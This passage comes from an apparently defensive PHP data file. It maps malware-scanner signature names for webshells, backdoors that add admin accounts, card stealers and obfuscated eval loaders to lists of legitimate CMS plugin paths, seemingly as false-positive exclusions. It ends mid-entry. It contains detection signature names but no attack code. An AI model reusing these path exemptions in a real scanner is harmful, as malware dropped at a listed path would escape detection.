'php.backdoor.uploader.032' => array('/prel-score-admin/inc/send_password.php', '/loginsubmit.php', '/taopix/taopix_external_shopping_cart_sample.php', '/wp-content/plugins/myikona-taopix/controllers/connector.php', '/hydravid.php', ), 
'php.backdoor.uploader.100' => array('/wp-content/plugins/gotmls/index.php', ), 
'php.backdoor.uploader.221' => array('sucuri-db-backup-', ), 
'php.backdoor.uploader.260' => array('/wp-content/plugins/ecommerce-product-catalog/includes/settings/csv.php', '/wp-content/plugins/wp-e-commerce/wp-shopping-cart/display-items.php', '/ecommerce-product-catalog/includes/settings/csv.php', ), 
'php.backdoor.uploader.270' => array('/update-stock/update-stock.phtml', '/ckeditor/plugins/imageuploader/imgupload.php', '/team/includes/merch_functions.php', ), 
'php.backdoor.uploader10' => array('/wp-content/plugins/cherry-plugin/admin/import-export/upload.php', '/file_upload.php', '/app/code/local/Indianic/Importproducts/Model/Vendor.php', ), 
'php.backdoor.uploader_gen.001' => array('/wp-content/plugins/wpematico_fullcontent/inc/functions.php', ), 
'php.backdoor.webshell_gen.040' => array('/com_akoforms/fields.akoforms.php', ), 
'php.backdoor.webshell_gen.045' => array('/admin/wp-security-filesystem-menu.php', '/manager/actions/files.dynamic.php', ), 
'php.backdoor.webshell_gen.38.001' => array('sources/ipsclass.php', '/wp-content/plugins/minecraft-admin/mca-classes/snoopy.class.php', '/modules/module_user_ldap.php', '/lang/nl.php', '/includes/common_functions.php', ), 
'php.backdoor.wp-admin_bypass.001' => array('plugins/causeblast_external_plugin/functions.php', '/wp-content/plugins/awesome-support/functions.php', 'plugins/Ultimate_VC_Addons/admin/admin.php', '/auto-update/admin-functions.php', 'wp-content/plugins/PiMS-WLMPWC/wlmpwc_settings.php', 'wp-content/plugins/mm_forum_is_sp/mm_functions.php', 'plugins/active-directory-integration/ad-integration.php', 'wp-content/plugins/wp-awesome-support/functions.php', '/framework/functions/noo-login-socical.php', 'inc/crum-vc-ultimate/admin/admin.php', 'wp-voting-contest/owcontroller/ow_vote_ajax_controller.php', '/wp-content/plugins/pnd-members-only/pnd_members_only.php', '/wp-content/plugins/esig-auto-register-user/admin/esig-auto-user-register-admin.php', 'wp-content/plugins/dsp_dating/files/includes/functions.php', '/wp-content/themes/hoya/functions.php', '/wp-content/plugins/designnbuy/classes/class-wpsws-webservice-designnbuy.php', 'wp-content/plugins/wp-voting-contest/includes/votes-user-registration.php', '/wp-content/plugins/photo-contest/photo-contest.php', '/wp-content/plugins/stm_vehicles_listing/includes/vehicle_functions.php', '/plugins/temporary-login-without-password/public/class-wp-temporary-login-without-password-public.php', '/plugins/dsp_dating/files/includes/functions', ), 
'php.backdoor.wp_adminadd.010' => array('/wphostingaddadminuser/public/class-wphostingaddadminuser.php', '/userpro/functions/api.php', '/wp-content/themes/realtr/monetize/registration/registration.php', ), 
'php.backdoor.wp_adminadd.027' => array('/wp-content/plugins/pilotpress/pilotpress.php', ), 
'php.backdoor.wp_login.002' => array('/wp-content/plugins/spokal/api/libs/spokal-gzip-api.php', ), 
'php.backdoor.wp_login.003' => array(), 
'php.backdoor.wscript-shell.001' => array('swift/library/System/class.SWIFT_System.php', ), 
'php.exploit.sysinfo.001' => array('ace/snippets/java.js', '/lib/uploadlib.php', 'includes/functions.php', '/wp-content/nfwlog/firewall_', '/ace/src-min-noconflict/snippets/java.js', '/squirrelmail/plugins/set_user_data/config.php.sample', '/squirrelmail/plugins/set_user_data/config.php', '/squirrelmail/plugins/set_user_data/methods/passwd.php', '/squirrelmail/plugins/set_user_data/methods/passwd.php.sample', 'com_jhackguard/data/scans/rules.php', 'log/sh404sef/sec/log_', '/classes/view_gettingstarted_content.php', '/node_modules/debug/node.js', '/snippets/java.js', '/wp-content/plugins/ithemes-sync/functions.php', '/rst/directive/include.php', '/wmail/auth_pam.pl', '/wmail/auth_pop3.pl', '/wmail/auth_unix.pl', 'spamassassin/config.php', '/lib/antivirus/clamav/classes/scanner.php', '/ace/snippets/.svn/text-base/java.js.svn-base', '/qmake-function-reference.html', '/node_modules/babel-core/browser.js', '/node_modules/debug/src/node.js', '/node_modules/jscs/jscs-browser.js', '/grep.html', '/lib/horde/auth/passwd.php', '/homedir-polyfill/index.js', '/lib/base/Ego_System.php', 'Savant2/tests/templates/compile_bad.tpl.php', 'crawl/include/searchenginelist.php', 'ecc/lib/D.opencart.php', 'ecc/lib/M.opencart.php', 'cgi-bin/cpdownload/cpanelwrap.cgi', '/worker/node_modules/step/test/parallelTest.js', '/cgi-bin/fm/fm_preferences.pl', '/core/modules/rest/tests/src/functional/fileuploadresourcetestbase.php', '/core/modules/jsonapi/tests/src/functional/fileuploadtest.php', '/com_admintools/akeeba/platform/jfscan/engines/archiver/jfscan.php', '/smb4php/smb.php', '/user_guide/helpers/path_helper.html', '/gulp-util/node_modules/optimist/package.json', '/file.inc', '/smb4php/smb.php', '/antihacker/library/signature.php', '/squirrelmail/plugins/set_user_data/handlers/passwd_handler.php', '/pear/http_request2/docs/examples/upload-rapidshare.php', '/browser-sync/node_modules/optimist/package.json', ), 
'php.exploit.sysinfo.001.02' => array('/lib/base/Ego_System.php', 'Savant2/tests/templates/compile_bad.tpl.php', 'crawl/include/searchenginelist.php', 'com_jhackguard/data/scans/rules.php', 'ecc/lib/D.opencart.php', 'ecc/lib/M.opencart.php', 'cgi-bin/cpdownload/cpanelwrap.cgi', '/worker/node_modules/step/test/parallelTest.js', '/wmail/auth_pam.pl', '/cgi-bin/fm/fm_preferences.pl', '/core/modules/rest/tests/src/functional/fileuploadresourcetestbase.php', '/core/modules/jsonapi/tests/src/functional/fileuploadtest.php', ), 
'php.exploit.sysinfo.004' => array('cart66/admin/settings/debug.php', 'plugins/woocommerce-gateway-ypago/gateway-ypago.php', '/wp-content/plugins/batchmove/batch_admin.php', '/code/common.php', 'cart66-lite/admin/settings/debug.php', 'ajax-store-locator-wordpress/sl_admin_img-resize.php', '/sohoadmin/program/webmaster/plugin_manager/install_plugin.php', '/sohoadmin/program/webmaster/backup_restore.php', ), 
'php.hacktool.autodestroy.002' => array('/include/functions.php', '/system/lib/helper_classes.php', '/system/lib/general.php', ), 
'php.hacktool.dbshell_gen.001' => array('/mobile-bridge.php', ), 
'php.hacktool.generic.009' => array('/bin/product_sheet_reader.php', '/bin/quotepdfv2.php', '/bin/quotation_request_old.php', '/bin/price_with_comments.php', '/sp/quantity_break.php', '/app/code/local/needtool/', ), 
'php.hacktool.generic.018' => array('/wp-content/plugins/blackhole-bad-bots/inc/blackhole-template.php', ), 
'php.hacktool.mailer.016' => array('/lib/d.opencart', 'plugins/uber-grid/admin/support.class.php', 'BBA/includes/bba_functions.php', 'BBA/final-nomination.php', 'BBA/bba_ajax_comments.php', 'wp-content/plugins/WPHostingAddAdminUser/public/class-wphostingaddadminuser.php', 'catalog/model/account/campaign.php', '/b2/b2login.php', '/uber-grid/admin/support.class.php', '/uber-grid-new/admin/support.class.php', 'wp-content/plugins/uber-grid-new-ver/admin/support.class.php', '/wp-content/plugins/awesome-gallery/admin/support.class.php', '/wp-content/plugins/uber-grid-broken/admin/support.class.php', '/plugins/bulk-photo-to-product-importer-extension-for-woocommerce-premium/bptpi-premium.php', '/wp-content/uber-grid-new-ver/admin/support.class.php', '/wphostingaddadminuser/public/class-wphostingaddadminuser.php', '/wp-content/plugins/adrotate-pro/library/update-api.php', '/wp-content/plugins/adrotate-pro/library/license-api.php', '/easyuploader/cp/recovery.php', ), 
'php.hacktool.mailer.016.02' => array('/inregistrare-membru.php', '/catalog/model/account/customer.php', ), 
'php.hacktool.phishbackend.002' => array('/inc/buildfun.php', '/wp-content/plugins/nb-fw/inc/merlin/merlin.php', ), 
'php.hacktool.wp_admin_hider.001' => array('/wp-content/themes/react2017/fn-default/security.php', ), 
'php.hacktool.wp_admin_hider.002' => array('/plugins/insert-headers-and-footers/ihaf.php', '/includes/functions/wd_functions.php', ), 
'php.hacktool.wp_plugin_hider.001' => array('/wp-content/plugins/wp-custom-admin-interface/wp-custom-admin-interface.php', '/wp-content/plugins/dreamhost-panel-login.php', '/wp-content/plugins/nb-updater/nbupd_index.php', '/wp-content/plugins/ddpro/ddpro.php', '/wp-content/plugins/ultimate-client-dash-pro/include/pro-functions.php', ), 
'php.hacktool.wp_users.017' => array('/wp-content/themes/bb-theme-child/inc/hide-wm-admin.php', ), 
'php.injected.fake_wp_jquery.002' => array('/wp-content/plugins/mycurator/MyCurator.php', '/wp-content/themes/fetch/functions.php', ), 
'php.injected.fake_wp_jquery.003' => array('wp-content/plugins/royalslider/RoyalSliderAdmin.php', ), 
'php.mailer.POST.015' => array('/tools/swift/Swift/Plugin/MailSend.php', '/inc/mailhandlers/php.php', '/wp-content/themes/dandllivescan/forms/swiftmailer/swift/swift/plugin/mailsend.php', '/swift/plugin/mailsend.php', ), 
'php.mailer.POST.035' => array('FormToEmail.php', '/contactformtoemail.php', ), 
'php.mailer.generic.020' => array('/functions/theme-mail.php', ), 
'php.mailer.generic.022' => array('/app/code/community/Apptrian/Minify/Model/Cron.php', '/app/code/community/Apptrian/Subcategories/Model/Cron.php', '/app/code/community/Apptrian/ImageOptimizer/Model/Cron.php', '/modules/mod_s5_quick_contact/tmpl/default.php', '/wp-content/themes/rttheme18/rt-framework/classes/loading.php', '/wp-content/plugins/webinar_plugin/webinar-db-interaction/webinar-ajax-file.php', '/wp-content/plugins/wp_mofluid/API_class.php', '/rt-framework/classes/loading.php', '/includes/src/Apptrian_', '/rt20-extensions/inc/helper-functions.php', '/plugins/amazing-fullfilment-integration-for-woocommerce/amzfulfillment/adminpanel.php', '/includes_/src/apptrian_s', '/wp-content/plugins/gift-voucher/include/wpgv_item_pdf.php', '/wp-content/plugins/gift-voucher/include/wpgv_voucher_pdf.php', '/wp-content/plugins/nixe-extensions/inc/helper-functions.php', '/wp-content/plugins/businesslounge-extensions/inc/helper-functions.php', '/wp-content/plugins/mailoptin/src/connections/', ), 
'php.malware.assert.004' => array('/theme-core/src/fileuploader.php', '/wp-content/plugins/ins-event-scanning/vendor/phpunit/phpunit/src/framework/testbuilder.php', ), 
'php.malware.assert.008' => array('/plugins/system/joomlaidplogin/saml2idp/assertion.php', ), 
'php.malware.assert.010' => array('includes/normal/UtfNormalTest2.php', '/qtranslate_utils.php', '/SimpleSAML/Error/Assertion.php', '/tests/framework/restproxytestbase.php', '/zp-core/functions-basic.php', '/core/components/filedownloadr/model/php5-utf8', '/core/packages/filedownloadr-2.0.0-pl/modCategory', ), 
'php.malware.base64.002' => array('/mailhive/common/functions/template_engine.php', 'mailhive/filterbeez/filter_do_throttling_simple/magic_5.php', ), 
'php.malware.base64.002.007' => array('/wp-content/plugins/wp-filebase-pro/classes/prolib.php', ), 
'php.malware.base64.002.03' => array('/wp-content/plugins/simple-podcast-press/', 'sendy/_install.php', 'sendy/includes/functions.php', '/adiinviter/adiinviter_bootstrap.php', 'mailer/includes/functions.php', 'mailer/_install.php', '/wp-content/plugins/xyz-wp-insert-code-snippet/admin/xyz-wp-ics-key.php', '/com_admintools/akeeba/platform/jfscan/engines/archiver/jfscan.php', ), 
'php.malware.base64.003' => array('porpress/porpress.php', ), 
'php.malware.base64.004' => array('app/code/local/Magmodules/Snippets/Model/System/Config/Model/', 'app/code/community/Magmodules/Googleshopping/Model/System/Config/Model/License.php', 'app/code/local/Magmodules/Shopreview/Model/System/Config/Model/', 'app/code/local/Magmodules/Reviewemail/Model/System/Config/Model/', 'Magmodules/Alternatelang/Model/System/Config/Model/License.php', 'core/cache/includes/elements/modplugin/13.include.cache.php', 'core/cache/scripts/elements/modplugin/13.cache.php', '/core/cache/context_settings/web/context.cache.php', 'core/cache/context_settings/mgr/context.cache.php', '/adiinviter/adiinviter_bootstrap.php', 'includes/src/Magmodules_Snippets_Model_System_Config_Model_License.php', 'app/code/local/Magmodules/Googleshopping/Model/System/Config/Model/License.php', 'app/code/local/Magmodules/WidgetBestsellers/Model/System/Config/Model/License.php', '/app/code/community/Eabi/Livehandler/Block/Licence.php', '/app/code/community/Magmodules/Googleshopping/Model/Adminhtml/System/Config/Model/License.php', ), 
'php.malware.base64.005.05' => array('generate-less/Less.php', 'wp-content/plugins/woocommerce-product-sort-and-display/classes/class-wc-psad-functions.php', ), 
'php.malware.base64.007' => array('/wp-content/plugins/memberium2/lib/sessions.php', ), 
'php.malware.base64.009' => array('app/code/local/MageWorkshop/DetailedReview/Helper/Data.php', 'app/code/local/MageWorkshop/DetailedReview/Model/Observer.php', 'FGXseal.php', '/mjguest/mjguest.class.php', '/app/code/community/All4coding/Core/', 'wp-content/plugins/bulletproof-security/admin/tools/b64-offline-decoder.php', '/includes/src/all4coding_core_block_widget_grid_column_renderer_hidetext.php', '/includes/src/all4coding/core/controllers/adminhtml/all4coding/corecontroller.php', '/includes/src/all4coding_core_', '/includes/src/all4coding/core/', ), 
'php.malware.base64.010.02' => array('/wp-content/plugins/scarcitysamurai/scarcity-samurai.php', 'Model/Saveconfig.php', '/components/com_rsmonials/rsmonials.php', '/modules/mod_rsmonialscroller/mod_rsmonialscroller.php', '/includes/src/MST_Menupro_Model_Saveconfig.php', 'modules/mod_rsspotter/helper.php', '/app/code/community/Webcooking/All/Block/Adminhtml/Wclc.php', '/app/code/community/Webcooking/All/controllers/IndexController.php', '/template/onestepcheckout/onestepcheckout.phtml', '/wp-content/plugins/wpseo/wpseo.php', '/wp-content/plugins/wp-onlywire-auto-poster/onlywire-auto-poster.php', '/wp-content/plugins/woocommerce-quotes-and-orders/admin/wc-email-inquiry-init.php', '/wp-content/plugins/gmap-embed/includes/form_actions.php', '/app/code/local/webcooking/all/block/adminhtml/wclc.php', '/onestepcheckout/1onestepcheckout.phtml', '/app/code/community/webcooking/all/model/observer.php', '/includes/src/mst_fancycheckout_model_saveconfig.php', '/modules/mod_rsmonials/mod_rsmonials.php', ), 
'php.malware.base64.015' => array('/locator/locate.php', '/components/com_flippingbook/', '/bluadmin/', '/wp-content/plugins/page-flip-image-gallery', '/app/code/local/maconeto/bring/helper/data.php', ), 
'php.malware.base64.017' => array('/wp-content/plugins/jw-cloud-sites-wp-scanner/jw-wp-scanner.php', '/app/code/community/Magebird/Popup/', 'plugins/easy-media-gallery-pro/easy-media-gallery-pro.php', 'wp-content/plugins/easy-media-gallery-pro/includes/functions/functions.php', 'wp-content/plugins/easy-media-gallery-pro/includes/shortcode.php', 'wp-content/plugins/easy-media-gallery-pro/includes/templates/ajax-album.php', 'wp-content/plugins/easy-media-gallery-pro/includes/templates/emg-album-back.php', 'wp-content/plugins/easy-media-gallery-pro/includes/templates/emg-album.php', 'wp-content/plugins/easy-media-gallery-pro/includes/templates/emg-carousel.php', 'wp-content/plugins/easy-media-gallery-pro/includes/templates/emg-fotorama.php', 'wp-content/plugins/easy-media-gallery-pro/includes/templates/emg-slider-one.php', 'wp-content/plugins/easy-media-gallery-pro/includes/templates/emg-slider-two.php', '/app/code/community/Php4u/Notification/', '/app/code/community/Php4u/CatalogSearch/', '/app/code/community/Php4u/BlastLuceneSearch/', '/app/code/community/Php4u/Adminhtml/', '/wp-content/plugins/jw-cloud-sites-wp-scanner/jw-wp-scanner.php', 'application/controllers/', 'application/core/MY_Controller.php', 'application/helpers/', 'application/libraries/', 'application/models/', 'lookforbadguys.php', 'administrator/components/com_gmapfp/models/fields/modal/cp.php', 'administrator/components/com_gmapfp/script.php', 'admin/functions/check.inc.php', 'admin/functions/class.inc.php', 'admin/functions/donate.inc.php', 'admin/functions/mail.inc.php', 'admin/popups/paypal-donate.inc.php', 'includes/config.inc.php', 'admin/pages/lizenz.inc.php', 'com_jhackguard/data/scans/rules.php', 'Extendware/EWEmail', 'Extendware/EWCacheBackend', 'Extendware/Api', 'Extendware/EWCore', 'Extendware/EWCrawler', 'Extendware/EWDeferredIndexing', 'Extendware/EWEntityIncrement', 'Extendware/EWImageOpt', 'Extendware/EWMinify', 'Extendware/EWPageCache', 'Extendware/EWPSorting', 'includes/src/Extendware_', 'includes/src/Php4u_', 'Php4u/Adminhtml/controllers/', 'Php4u/BlastLuceneSearch/', 'Php4u_Adminhtml_Block_System_Cache_Edit.php', 'Php4u_BlastLuceneSearch_', 'Php4u_CatalogSearch_Model_', 'Php4u_Notification_Model_', 'lib/Customweb/Licensing/AuthorizeNetCw/Key.php', 'lib/Customweb/Licensing/PayPalCw/Key.php', '/wp-content/plugins/easy-image-slider-pro/inc/ewic-shortcode.php', '/wp-content/plugins/easy-image-slider-pro/inc/ewic-template-helper.php', '/wp-content/plugins/easy-image-slider-pro/inc/ewic-template.php', '/wp-content/plugins/wp-secure-amazon-s3/wp-secure-amazon-s3.php', '/lib/magebird/popup/popup_helper.php', '/lib/magebird/popup/product_model.php', '/lib/magebird/popup/popup_model.php', '/app/code/community/Php4u/BlastSearchAutocompleter/', '/includes/src/Php4u/BlastSearchAutocompleter/controllers/SuggestController.php', '/shell/lucene-tool.php', '/plugins/system/cp/cp.php', '/app/code/local/Extendware/EWLoyalty/controllers/', '/app/code/local/Extendware/EWGADashboard/', '/js/includes/src/Magebird', '/includes/src/extendware/ewextensionconflict/controllers/adminhtml/rewritecontroller.php', '/app/code/local/extendware/ewextensionconflict/helper/config.php', 'wp-content/plugins/easy-image-slider-pro/easy-image-slider-pro.php', '/includes/src/extendware/ewcatcopy', '/app/code/local/extendware/ewcatcopy', '/app/code/local/extendware/ewgppercent/', '/xgrid/includes/twitteroauth/oauth.php', '/xgrid/forcemagic/options.php', '/includes/src/magebird', '/wp-content/plugins/easy-contact-form-pro/easy-contact-form-pro.php', 'lib/Customweb/Licensing/Barclaycardsmartpaycw/Key.php', '/app/code/local/extendware/eworderstatuset/', ), 
'php.malware.base64.018' => array('/adiinviter/functions.php', ), 
'php.malware.base64.019' => array('wysija-newsletters/controllers/back/subscribers.php', '/com_easyblog/assets/js/inter/admin/functions/process.php', '/app/code/community/webcooking/all/controllers/indexcontroller.php', '/app/code/community/webcooking/all/block/adminhtml/wclc.php', '/app/code/local/webcooking/all/block/adminhtml/wclc.php', ), 
'php.malware.base64.021' => array('components/com_perfectdashboard/controller.php', '/components/com_perfectdashboard/models/update.php', '/components/com_perfectdashboard/installer.script.php', ), 
'php.malware.base64.023' => array('/devinc/license', 'billing/includes/api/getticketnote.php', '/Devinc_License_', '/adult/IndexController.php', '/includes/src/nett_prescription_block_nhsconfirm.php', '/includes/src/nett_prescription_helper_surgery.php', '/includes/src/ings/onlinerequest/controllers/requestlistcontroller.php', '/includes/src/ings/onlinerequest/controllers/disapprovedlistcontroller.php', '/myadmin/functions/decrypt', '/_models/pages/login.php', '/getticketnote.php', '/app/code/community/magextension/sdocp/model/observer.php', ), 
'php.malware.cc_stealer.018' => array('/wp-content/nitropack/', ), 
'php.malware.chord64.001' => array('app/code/community/TBT/Common/Block/Admin/Abstract.php', 'app/code/community/TBT/Common/Block/Admin/Widget/Form/Abstract.php', 'app/code/community/TBT/Common/Block/Adminhtml/Page/Menu.php', 'app/code/community/TBT/Common/Block/Billboard/Default.php', 'app/code/community/TBT/Common/Block/Billboard/NoLicense.php', 'app/code/community/TBT/Common/Block/Billboard/NoLicenseFiles.php', 'app/code/community/TBT/Common/Block/Front/Abstract.php', 'app/code/community/TBT/Common/Helper/Array.php', 'app/code/community/TBT/Common/Helper/Data.php', 'app/code/community/TBT/Common/Helper/LoyaltyAbstract.php', 'app/code/community/TBT/Common/Helper/Strings.php', 'app/code/community/TBT/Common/Helper/Version.php', 'app/code/community/TBT/Common/Model/Abstract.php', 'app/code/community/TBT/Common/Model/Biglight.php', 'app/code/community/TBT/Common/Model/System/Config/Backend/LicenseAbstract.php', 'app/code/community/TBT/Common/controllers/Admin/AbstractController.php', 'app/code/community/TBT/Common/controllers/Front/AbstractController.php', 'app/code/community/TBT/Rewards/Block/Manage/Widget/Loyalty.php', 'app/code/community/TBT/Rewards/Helper/Loyalty.php', 'app/code/community/TBT/Rewards/Helper/Loyalty/Checker.php', 'app/code/community/TBT/RewardsLoyalty/Block/Billboard/NoAccount.php', 'app/code/community/TBT/RewardsLoyalty/Helper/Loyalty.php', 'app/code/community/TBT/RewardsLoyalty/Model/Platform/Instance.php', 'app/code/community/TBT/RewardsLoyalty/Model/Rewards/Controller/Manage/Config/Platform/Observer.php', 'app/code/community/TBT/RewardsLoyalty/controllers/PlatformController.php', 'includes/src/SweetTooth/classes/Loyalty.php', 'includes/src/SweetTooth_classes_Loyalty.php', 'includes/src/TBT/Common/controllers/Admin/AbstractController.php', 'includes/src/TBT/Common/controllers/Front/AbstractController.php', 'includes/src/TBT/RewardsLoyalty/controllers/PlatformController.php', 'includes/src/TBT_Common_Block_Admin_Abstract.php', 'includes/src/TBT_Common_Block_Admin_Widget_Form_Abstract.php', 'includes/src/TBT_Common_Block_Adminhtml_Page_Menu.php', 'includes/src/TBT_Common_Block_Billboard_Default.php', 'includes/src/TBT_Common_Block_Billboard_NoLicense.php', 'includes/src/TBT_Common_Block_Billboard_NoLicenseFiles.php', 'includes/src/TBT_Common_Block_Front_Abstract.php', 'includes/src/TBT_Common_Helper_Array.php', 'includes/src/TBT_Common_Helper_Data.php', 'includes/src/TBT_Common_Helper_LoyaltyAbstract.php', 'includes/src/TBT_Common_Helper_Strings.php', 'includes/src/TBT_Common_Helper_Version.php', 'includes/src/TBT_Common_Model_Abstract.php', 'includes/src/TBT_Common_Model_Biglight.php', 'includes/src/TBT_Common_Model_System_Config_Backend_LicenseAbstract.php', 'includes/src/TBT_RewardsLoyalty_Block_Billboard_NoAccount.php', 'includes/src/TBT_RewardsLoyalty_Helper_Loyalty.php', 'includes/src/TBT_RewardsLoyalty_Model_Platform_Instance.php', 'includes/src/TBT_RewardsLoyalty_Model_Rewards_Controller_Manage_Config_Platform_Observer.php', 'includes/src/TBT_Rewards_Block_Manage_Widget_Loyalty.php', 'includes/src/TBT_Rewards_Helper_Loyalty.php', 'includes/src/TBT_Rewards_Helper_Loyalty_Checker.php', 'lib/SweetTooth/classes/Loyalty.php', ), 
'php.malware.create_function.001' => array('/com_admintools/akeeba/platform/jfscan/engines/archiver/jfscan.php', ), 
'php.malware.create_function.015' => array('/sources/managemembers.php', '/forum/sources/store2.php', ), 
'php.malware.db_drop.002' => array('/wp-content/wp-cerber/dashboard.php', ), 
'php.malware.db_drop_gen.001' => array('/wp-content/plugins/spider-facebook/spider-facebook.php', '/wp-content/plugins/magic-fields/RCCWP_Application.php', '/wp-content/plugins/form-maker/Form_Maker.php', '/wp-content/plugins/reusables/reusables.php', '/spider-faq/faq.php', 'wp-content/plugins/player/Player.php', 'wp-content/plugins/user-control/uninstall.php', 'wp-content/plugins/catalog/catalog.php', 'plugins/data-fields/RCCWP_Application.php', '/framework/class/class_admin.php', 'wp-content/plugins/flash-calendar/spiderfc.php', '/wp-content/plugins/wp-backup-bank/lib/install-script.php', 'wp-content/plugins/xyz-wp-smap/admin/destruction.php', '/wp-content/reusables/reusables.php', '/wp-content/plugins/wp-mail-bank/lib/install-script.php', '/wp-content/plugins/wp-clean-up-optimizer/lib/install-script.php', 'wp-content/plugins/wp-clean-up-optimizer-developer-edition/lib/install-script.php', '/wp-content/plugins/captcha-bank/lib/install-script.php', '/upgrade/wp-mail-bank', 'wp-content/plugins/spider-event-calendar/calendar.php', ), 
'php.malware.dropper.004' => array('/plugins/custom-field-template/custom-field-template.php', ), 
'php.malware.eval_gen.001' => array('/WebForms/Block/Adminhtml/Results/Grid.php', '/WebForms/Block/Adminhtml/Webforms/Edit.php', '/WebForms/Block/Adminhtml/Webforms.php', '/WebForms/Block/Webforms.php', '/WebForms/controllers/Adminhtml/FieldsController.php', '/WebForms/controllers/Adminhtml/WebformsController.php', 'app/code/local/Wyomind/Datafeedmanager/Model/Configurations.php', '/app/code/local/Itoris/Installer/', '/app/code/local/Itoris/Producttabsslider/', '/reachout/createToken.js.php', '/reachout/mailit.php', '/plugins/_wp-online-store/', 'app/code/community/Mgt/Varnish/Model/', 'app/code/community/Mgt/Varnish/Helper', 'app/code/community/Mgt/Varnish/controller', 'app/code/community/Mgt/Varnish/Block', '/wp-content/plugins/trustjacker_2.01/dashboard.php', '/wp-content/plugins/trustjacker_2.01/activate.php', '/wp-content/plugins/trustjacker_2.01/install.php', '/wp-content/plugins/trustjacker_2.01/doc.php', '/wp-content/plugins/trustjacker_2.01/php/Snoopy-1.2.4/Snoopy.class.php', '/wp-content/plugins/trustjacker_2.01/Zend_Utf8.php', '/app/etc/code/community/Mgt/Varnish/Block/Adminhtml/System/Config/Fieldset/Route/Cachelifetime.php', '/app/etc/code/community/Mgt/Varnish/Helper/Data.php', '/app/etc/code/community/Mgt/Varnish/Model/Observer.php', '/includes/src/VladimirPopov_old_WebForms_Block', 'includes/remote/remote.inc.php', 'admin/sources/products/import.inc.php', 'modules/3rdparty/Customer_Groups_Discount/functions1.inc.php', '/app/code/local/Anowave/Package/controllers/IndexController.php', '/gbook.php', '/app/code/local/Itoris/SmartLogin/', '/wp-content/plugins/bulletproof-security/admin/tools/tools.php', 'includes/src/Itoris_PendingRegistration_Helper_Data.php', '/includes/src/Itoris_Installer_Store_Collection.php', 'includes/src/Itoris_PendingRegistration_Helper_installation_script.php', 'includes/src/Itoris_Installer_code_IInstaller.php', '/app/code/community/All4coding/Core/', '/plugins/WPRobot3/wprobot.php', 'wp-content/plugins/bulletproof-security/admin/tools/b64-offline-decoder.php', '/admin/admin_main.php', '/inc/footer.inc.php', '/app/code/community/Wee/AdvancedProductManagement/', '/includes/src/Wee_AdvancedProductManagement_', '/includes/src/Wee/AdvancedProductManagement/', '/includes/src/vladimirpopov_webforms_block', '/includes/src/wee_advancedordermanagement_', '/includes/src/mgt_varnish_', '/includes/src/mgt/varnish/controllers/adminhtml/mgtvarnishcontroller.php', ), 
'php.malware.eval_hex.001' => array('/amember/library/Am/License.php', '/amember/rconfig.inc.php', '/sanalpospro/controllers/', '/sanalpospro/lib/', '/xmypfb/members/library/am/license.php', ), 
'php.malware.eval_hex.002' => array('/app/code/community/Medma/Registrationremove/Model/Authenticate.php', 'application/modules/Siteluminous/controllers/license/license.php', 'application/modules/Seaocore/controllers/license/request.php', 'application/modules/OldSiteluminous/controllers/license/license2.php', '/application/modules/Site', '/application/modules/Communityad/controllers/license/', '/application/modules/Seaocore/controllers/license/', '/application/modules/Communityad/controllers/license/', '/application/modules/Advancedactivity/controllers/license/', '/application/modules/Sitemobile/controllers/license/', '/application/modules/Sitealbum/controllers/license/', '/application/modules/Sitereview/controllers/license/', '/application/modules/Seaocore/controllers/license/', ), 
'php.malware.eval_hex.003' => array('wp-content/plugins/social-link-machine/', '/sendy/install.php', 'endy/includes/functions.php', '/mailer/includes/functions.php', '/phpchat-free/class.phpmailer.php', ), 
'php.malware.extract.001' => array('bhaskar-rss-new.php', ), 
'php.malware.file_exists.002' => array('/plugins/magicmembers/core/admin/mgm_admin_coupons.php', '/plugins/extra/general/remoteagent/magmi_remoteagent.php', ), 
'php.malware.fopo_obfuscator.001' => array('system/config/paladinrm/prmFunction.php', '/CoreClass.php', '/autokey/encrypt.php', '/autokey/decrypt.php', ), 
'php.malware.gd-lib.002' => array('/wp-content/plugins/photography-management/code/utils.php', ), 
'php.malware.generic.002' => array('/app/code/community/Scommerce/', '/includes/src/Celebros_Celexport', '/includes/src/scommerce', ), 
'php.malware.generic.005' => array('plugins/_wp-online-store/', '/wp-content/plugins/trustjacker_2.01/dashboard.php', '/wp-content/plugins/trustjacker_2.01/activate.php', '/wp-content/plugins/trustjacker_2.01/install.php', '/wp-content/plugins/trustjacker_2.01/doc.php', '/wp-content/plugins/trustjacker_2.01/php/Snoopy-1.2.4/Snoopy.class.php', '/wp-content/plugins/trustjacker_2.01/Zend_Utf8.php', '/gbook.php', '/pjus.php', ), 
'php.malware.generic.006.02' => array('includes/src/GoMage_Checkout_Helper_Data.php', 'includes/src/Moogento_Pickpack_Block_Adminhtml_System_Config_Fieldset_Hint.php', 'includes/src/Moogento_Pickpack_Helper_Moo.php', 'includes/src/Moogento_Pickpack_Model_Adminhtml_System_Config_Backend_Import_Name.php', 'includes/src/Moogento_Pickpack_Model_Feed_Updates.php', 'includes/src/Moogento_ShipEasy_Block_Adminhtml_System_Config_Fieldset_Hint.php', 'includes/src/Moogento_ShipEasy_Helper_Moo.php', 'includes/src/Moogento_ShipEasy_Model_Adminhtml_System_Config_Backend_Import_Name.php', 'includes/src/Moogento_ShipEasy_Model_Feed_Updates.php', '/applications/awards/extensions/rules/Definitions/Awards.php', 'app/code/local/moogento/', '/sendy/_install.php', '/sendy/includes/functions.php', '/wp-content/plugins/raffle-ticket-generator-pro/includes/', '/autokey/mailer/includes/functions.php', '/sendy2/includes/functions.php', '/apibuscape/', '/app/code/moogento/pickpack/', ), 
'php.malware.generic.010' => array('/Smarty.class.php', '/wp-content/plugins/wp-faq/includes/checkinit.php', '/code/local/Mlx/', '/includes/src/Mlx_', '/Mlx/Mlx/controllers/Adminhtml/Mlx/LicenseController.php', '/Mlx/Acontact/controllers/Adminhtml/AcontactController.php', '/Mlx/Acontact/controllers/IndexController.php', 'app/code/community/LitExtension/CustomerPassword/Model/Customer.php', '/wp-content/plugins/lecartmigration/views/', '/wp-content/plugins/lecartmigration/models/', '/wp-content/plugins/lecartmigration/core.php', '/includes/src/litextension', '/app/code/local/spletnisistemi/inquiry/model/mysql4/setup.php', '/app/code/local/spletnisistemi/inquiry/block/adminhtml/inquiry.php', '/app/code/local/spletnisistemi/inquiry/controllers/adminhtml/inquirycontroller.php', '/app/code/local/spletnisistemi/inquiry/model/source.php', '/myadmin/login.php', '/myadmin/functions/check_', '/app/code/litextension', '/app/code/community/LitExtension', '/app/code/mlx/core/', '/includes/src/mlx/cot/', '/includes/src/mlx/mlx/controllers', '/cartmigration_app/adminer/', '/cartmigration_app/app/', 